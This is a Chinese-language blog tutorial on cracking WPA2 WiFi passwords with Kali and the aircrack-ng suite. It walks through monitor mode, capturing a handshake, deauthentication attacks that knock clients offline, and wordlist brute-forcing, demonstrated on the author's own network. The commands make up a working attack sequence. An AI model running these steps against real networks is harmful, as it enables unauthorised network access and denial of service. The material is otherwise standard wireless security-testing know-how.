首页 > 其他分享 >无线网渗透之Kali破解wifi密码

无线网渗透之Kali破解wifi密码

时间:2023-06-28 11:57:38浏览次数:40  
标签:Kali wifi ng 网卡 字典 无线网 监听 抓包 路由器

kali破解wifi密码(WiFi渗透)

一、前期准备工作

1、将无线网卡挂载到Kali上

​ 将无线网卡插到电脑上,如果弹出检测到新的USB设备,就将此设备连接到虚拟机。然后点击虚拟机--->可移动设备--->选择自己的网卡--->连接

image-20220513162708667

可能出现的问题:在可移动设备处无法连接无线网卡;解决:在虚拟机设置中将usb控制器设置成如图所示。注意要先关闭虚拟机在设置。

image-20220513144527731

2、查看是否挂载成功

​ 使用ifconfig命令查看是否存在wlan0网卡,如果不现在可能是未挂载成功或者wlan0网卡不是激活状态

# 显示up状态(激活状态)的网卡信息
ifconfig
# 显示所有网卡的信息,包含未up的
ifconfig -a
# 激活wlan0
sudo ifconfig wlan0 10.0.0.100 up

image-20220513143707563

3、查看网卡是否支持监听模式

# 使用su切换root,后面操作基本都需要root权限
su
# 使用airmon-ng查看,如果PYH一栏为null,表示不支持监听模式
airmon-ng

# 如果不支持监听模式请更换无线网卡,或者使用监听驱动 
# 参考 https://www.cnblogs.com/answerThe/p/12488477.html ,https://github.com/aircrack-ng?tab=repositories

image-20220513144120181

4、检查文件监听影响并杀死影响

# 检查影响
airmon-ng check
# 杀死影响
airmon-ng check kill 

image-20220513144853796

二、网卡监听抓包操作

5、开启无线网卡监听模式

# 开启无线监听,wlan0网卡就是刚刚上面使用ifconfig看到的网卡,开启监听模式后,无线网卡接口wlan0变动为wlan0mon, 能够输入ifconfig进行查看
airmon-ng start wlan0

image-20220513150442797

6、监听周边的WIFI

# 查看周边wifi,注意此时的网卡是wlan0mon,记录需要攻击的目标的BSSID和CH
airodump-ng wlan0mon

image-20220513151758327

7、开始抓包监听

### 抓包命令,请注意此抓包的shell窗口不要关闭
# 注意此处的shell窗口如果关闭过,抓的包的存储名称会有变化,后面解包时要注意,进入wifitest目录查看.cap的包
# 命令格式:airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0monbssid就是要抓取包的mac地址,信道频率 是CH,)

mkdir wifitest
airodump-ng --bssid A4:39:B3:15:B5:9E -c 3 -w ./wifitest/ wlan0mon

# BSSID: 无线 AP 的硬件地址
# PWR: 信号强度,值是负数,绝对值越小表示信号越强
# CH: 无线网络信道
# ENC: 加密方式,我们要破解的是 WPA2
# ESSID: 无线网络的名称
# BSSID: 无线 AP 的硬件地址
# STATION: 用户设备的硬件地址

image-20220513152916961

8、强制下线重连

实战中以信号最强的为例(PWD为信号强度,越小信号越强),这里我强制我的手机下线重连(mac地址为---> A4:4B:D5:AC:41:7C)

# 新建一个shell窗口进行攻击
aireplay-ng -0 10 -a A4:39:B3:15:B5:9E -c A4:4B:D5:AC:41:7C wlan0mon

# -0 冲突攻击模式,用于使客户端断开与路由器的连接
# 10 为攻击的次数,如果一直跑不出来可以把线程设置大一点。设置为0会无限攻击,导致客户端一直无法连接路由器,请谨慎使用
# -a 路由器mac地址  -c 客户端mac地址

9、成功抓包及原理讲述

握手包抓取原理:当客户端与路由器建立链接进行通信时,会发送包含hash算法加密的密码数据包,也就是握手包。通过软件捕获此数据包,就完成了抓包。如果在抓包期间没有客户端连接路由器的过程,那就不会有握手包的发送,也就无法抓取握手包了,只能期待有新客户端连接路由器,或者原有客户端掉线后重新连接。除了漫长的等待我们还有一种方法,使用aircrack-ng套件的另一个工具aireplay-ng,它可以强制用户掉线并自动连接路由器,这样就有机会抓到握手包了(如果线程设置大的话,就会导致用户一直连不上网)。在airodump-ng抓包过程中,只要有设备连接到路由器,在station栏中找到它们的mac地址,此时重新打开一个终端,输入命令强制用户掉线重连,直至抓包监听的shell窗口出现WPA handshake即表示抓包成功。

image-20220513154530794

三、字典爆破解密

10、结束监听

# 抓包完成后就可以结束监听了,抓的包存储在wifitest目录下,进目录查看是否只有一个.cap的包,如果有多个,可能就是前面抓包时关闭过shell窗口,导致抓取了多个包,需要确定带有密码的包是哪一个,或者都进行爆破

# 在抓包的shell窗口先ctrl+c,再输入下面命令结束监听
airmon-ng stop wlan0mon

image-20220513160051602

11、字典爆破解密

# 先将Kali自带的字典解压,这是1个一千四百多万的大字典,爆破完估计得几天
gzip -d /usr/share/wordlists/rockyou.txt.gz
# 解密  -W 字典路径
aircrack-ng -w /usr/share/wordlists/rockyou.txt ./wifitest/-01.cap

接下来就是漫长的等待,也有可能解密不成功,这就是字典的问题,字典越大,越容易成功,也可在网上下载其他字典

image-20220513160657004

image-20220513162154788

# 这里为了演示效果,就使用自己新建的一个字典解密,我的密码是wang12345,kali那个字典里没有。。。
aircrack-ng ./wifitest/-01.cap -b A4:39:B3:15:B5:9E -w ./pass.txt

image-20220513161647344

标签:Kali,wifi,ng,网卡,字典,无线网,监听,抓包,路由器
From: https://www.cnblogs.com/charonlight/p/17510998.html

相关文章

  • 苹果手机连上WiFi后上不了网
    1、可能是关机之后,再次开机的时候显示的时间不对,在时间与日期里把那个时间调成自动就好了.2、①手机长时间的使用可能会导致手机发热卡顿,所以先将手机关机,等待5分钟左右重启手机,这样手机就可以正常上网。   ②重启手机后连上WiFi依然无法上网,可以通过还原网络设置来解决问......
  • [渗透测试]—6.3 无线网络渗透测试工具
    在本章节中,我们将学习一些常用的无线网络渗透测试工具,如Aircrack-ng、Reaver等。我们将尽量讲解得详细、通俗易懂,并提供尽可能多的实例。6.1Aircrack-ng套件Aircrack-ng是一个用于测试无线网络安全的工具集,包括捕获数据包、破解WEP和WPA/WPA2-PSK密钥、创建和管理访问点等功能......
  • Wallys/wifi 6 router ipq8072 enterprise wireless dual band /support wifi6e card.
    DR8072V01isanetworkingrouterpcbabasedonQualcommIPQ8072Acommunicationprocessor,withtwo10GbEinterfaces,onethroughanSFPcageandtheotherthroughanRJ45connector,plusfourGigabitEthernetports,and4×4MIMOWiFi6connectivity.Bas......
  • Kali Linux 2023.2为Xfce版带来PipeWire支持
    Kali Linux 2023.2为Xfce版带来PipeWire支持,彻底改造i3桌面,这个版本还引入了一个新的Hyper-VVM镜像,以及几个新的黑客工具。OffensiveSecurity宣布了他们流行的道德黑客和渗透测试GNU/Linux发行版的新版本,带来了新的功能,更新和新的工具,以及许多改进,KaliLinux2023.2。......
  • Kali Linux 2023.2为Xfce版带来PipeWire支持
    Kali Linux 2023.2为Xfce版带来PipeWire支持,彻底改造i3桌面,这个版本还引入了一个新的Hyper-VVM镜像,以及几个新的黑客工具。OffensiveSecurity宣布了他们流行的道德黑客和渗透测试GNU/Linux发行版的新版本,带来了新的功能,更新和新的工具,以及许多改进,KaliLinux2023.2。......
  • Kali Linux 2023.2为Xfce版带来PipeWire支持
    Kali Linux 2023.2为Xfce版带来PipeWire支持,彻底改造i3桌面,这个版本还引入了一个新的Hyper-VVM镜像,以及几个新的黑客工具。OffensiveSecurity宣布了他们流行的道德黑客和渗透测试GNU/Linux发行版的新版本,带来了新的功能,更新和新的工具,以及许多改进,KaliLinux2023.2。......
  • 【pywifi】Windows下import pywifi库报错:ModuleNotFoundError: No module named ‘com
    1、解决方法pipinstallcomtypes 参考链接:(88条消息)Windows下importpywifi库报错:ModuleNotFoundError:Nomodulenamed‘comtypes‘原因排查_广东上大分的博客-CSDN博客......
  • Wallys WIFI7 Mainboard /the difference between ipq9574 with ipq9554/DBDC.
    WIFI7MainboardSPECTheIPQ9574andIPQ9554arebothsystem-on-chip(SoC)solutionsdesignedbyQualcommfornetworkingapplications,buttheybelongtodifferentgenerationsandofferdifferentcapabilities.Herearethekeydifferencesbetweenthetwo:G......
  • 在一加7上kali nethunter安装好后更新到最新版本,vnc打开失败问题解决方法。
    首先说明nethunter的vnc本身就不稳定,是兼容性问题,而非非正常关闭导致的。解决方法:方法一:查看nethunre主app的开启vnc命令是不是终端不识别。现在vnc叫做kex。方法二:更新到最新版本,sudoaptupdate&aptupgrade,如果还是打不开的话,更新nethunre主app,在https://store.nethunter.co......
  • 虚拟机VMware安装Kali 2020.1b
    本次安装版本:KaliLinux64-Bit2020.1bkali系统镜像下载在虚拟机VMware中安装kali,官网下载iso镜像虚拟机自己动手安装,或者下载官网的VMware文件然后导入虚拟机也行官方最新版kali:https://www.kali.org/downloads/官方历史版本kali:http://old.kali.org/kali-images/下载好得镜像最......